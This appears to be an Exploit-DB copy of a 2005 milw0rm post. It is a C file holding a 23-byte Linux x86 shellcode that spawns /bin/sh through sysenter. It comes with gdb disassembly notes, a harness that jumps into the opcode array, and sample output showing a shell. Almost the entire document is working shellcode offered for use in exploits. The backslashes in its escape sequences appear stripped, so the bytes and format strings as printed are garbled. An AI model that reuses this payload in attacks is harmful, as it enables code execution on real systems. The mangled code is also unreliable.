https://www.exploit-db.com/exploits/13412

漏洞细节尚未披露

/*
 lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
 Copyright(c) 2005 c0ntex <[email protected]>
 Copyright(c) 2005 BaCkSpAcE <[email protected]>

 This program is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.

 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU General Public License for more details.

 You should have received a copy of the GNU General Public License
 along with this program; if not, write to the Free Software
 Foundation, Inc., 59 Temple Place, Suite 330, Boston,
 MA  02111-1307  USA

*/

/*

Tested: fedora core 3 - c0ntex
	fedora core 4 - BaCkSpAcE
        debian SID - amnesia

execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80

(gdb) disas __kernel_vsyscall
Dump of assembler code for function __kernel_vsyscall:
0xffffe400 <__kernel_vsyscall+0>:       push   %ecx
0xffffe401 <__kernel_vsyscall+1>:       push   %edx
0xffffe402 <__kernel_vsyscall+2>:       push   %ebp
0xffffe403 <__kernel_vsyscall+3>:       mov    %esp,%ebp
0xffffe405 <__kernel_vsyscall+5>:       sysenter
0xffffe407 <__kernel_vsyscall+7>:       nop
0xffffe408 <__kernel_vsyscall+8>:       nop
0xffffe409 <__kernel_vsyscall+9>:       nop
0xffffe40a <__kernel_vsyscall+10>:      nop
0xffffe40b <__kernel_vsyscall+11>:      nop
0xffffe40c <__kernel_vsyscall+12>:      nop
0xffffe40d <__kernel_vsyscall+13>:      nop
0xffffe40e <__kernel_vsyscall+14>:      jmp    0xffffe403 <__kernel_vsyscall+3>
0xffffe410 <__kernel_vsyscall+16>:      pop    %ebp
0xffffe411 <__kernel_vsyscall+17>:      pop    %edx
0xffffe412 <__kernel_vsyscall+18>:      pop    %ecx
0xffffe413 <__kernel_vsyscall+19>:      ret
0xffffe414 <__kernel_vsyscall+20>:      add    %al,(%eax)
0xffffe416 <__kernel_vsyscall+22>:      add    %al,(%eax)
0xffffe418 <__kernel_vsyscall+24>:      add    %al,(%eax)
0xffffe41a <__kernel_vsyscall+26>:      add    %al,(%eax)
0xffffe41c <__kernel_vsyscall+28>:      add    %al,(%eax)
0xffffe41e <__kernel_vsyscall+30>:      add    %al,(%eax)
End of assembler dump.
(gdb) q

so we replace

int $0x80

instruction with

push   %ecx
push   %edx
push   %ebp
mov    %esp,%ebp
sysenter

which does make the shellcode slightly larger  :/


 804807a:       51                      push   %ecx
 804807b:       52                      push   %edx
 804807c:       55                      push   %ebp
 804807d:       89 e5                   mov    %esp,%ebp
 804807f:       0f 34                   sysenter

 $ ./lnx_binsh4

 [-] Stack Pointer found -> [0xbfe0f0d8]
         [-] Size of payload egg -> [23]
	 [-] Payload Begin -> [0x80496c0]
	 [-] Payload End   -> [0x80496d7]

 sh-3.00b$

*/

/*
 Calling: execve(/bin/sh), exit(0)
*/


#include <stdio.h>

typedef char wikkid;

/* reduced shellcode size from 45 to 23 - BaCkSpAcE */
wikkid oPc0d3z[] = "x6ax0bx58x99x52x68x2fx2f"
                   "x73x68x68x2fx62x69x6ex54"
                   "x5bx52x53x54x59x0fx34";

unsigned long grab_esp()
{
		__asm__("movl %esp,%eax");
}

int main(void)
{
	unsigned long delta;
	void (*pointer)();

	delta = grab_esp();

	fprintf(stderr, "n[-] Stack Pointer found -> [0x%x]n", delta);
	fprintf(stderr, "t[-] Size of payload egg -> [%d]n", sizeof(oPc0d3z)-1);

	pointer=(void*)&oPc0d3z;

	while(pointer) {
		fprintf(stderr, "t[-] Payload Begin -> [0x%x]n", pointer);
		fprintf(stderr, "t[-] Payload End   -> [0x%x]nn", pointer+23);
		pointer();
	}

	_exit(0);
}

// milw0rm.com [2005-09-04]